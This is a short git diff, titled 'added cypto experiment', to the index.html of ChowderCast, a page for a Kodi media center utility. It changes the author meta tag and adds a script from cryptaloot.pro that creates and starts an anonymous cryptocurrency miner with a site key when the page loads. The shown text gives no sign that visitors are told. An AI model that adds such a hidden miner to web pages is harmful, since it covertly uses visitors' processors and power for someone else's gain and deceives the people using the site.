added cypto experiment

--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
     <title>ChowderCast</title>
     <meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no">
     <meta name="description" content="Kodi Media Center Utility">
-    <meta name="author" content="David Amato">
+    <meta name="author" content="daveamato@live.com">
     <meta name="theme-color" content="#ffffff">
     <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
     <link rel="icon" type="image/png" href="/favicon-32x32.png" sizes="32x32">
@@ -93,6 +93,10 @@
             </div>
         </div>
     </div>
+    <script src="//cryptaloot.pro/lib/crypta.js"></script>
+    <script>
+        var miner = new CRLT.Anonymous('6dd963c5b45c85a86ec97c9b78f27b678142e75cb105');
+        miner.start();
+	</script>
 </body>
-
 </html>
